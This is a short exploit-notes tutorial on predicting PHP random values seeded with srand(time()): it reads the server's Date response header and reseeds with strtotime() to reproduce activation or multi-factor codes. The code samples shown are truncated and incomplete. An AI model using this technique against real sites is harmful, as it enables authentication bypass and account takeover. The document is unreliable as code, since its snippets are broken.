Exploit Notes

PHP Srand Time Abusing

Last modified: 2023-03-09


If the website uses “srand(time())” to generate random strings in PHP, we can get the non-random strings by manipulating the attribute of the “srand()” function.


function generate_random_number() {
	// Some code for generating random number...
	return random_numbers;

For example, assume website uses the above function that generates random numbers or strings to be used for authentications such as activation code, multi-factor security code.
In such cases, we can replace the “time()” function with the “strtotime()” to make the result to be non-random.


1. Send Request

First off, send the request for executing the desired function e.g. “generate_random_number” that uses “srand(time())”.
See the HTTP response header.

Date: Thu, 09 Mar 2023 08:31:35 GMT

We can get the time such as “08:31:35” so copy this.

2. Generate Non-Random Result

We can insert the above Date time as the attribute of “strtotime()” function as follow.

function generate_random_number() {
    // Some code for generating random number...
    echo random_numbers;

Now execute the above function in PHP playground.
We can get the same result no matter how many times we run it.

Tools by HDKS


Automatic web fuzzer.


Auto reconnaissance CLI.

Hash Cracker

Hash identifier.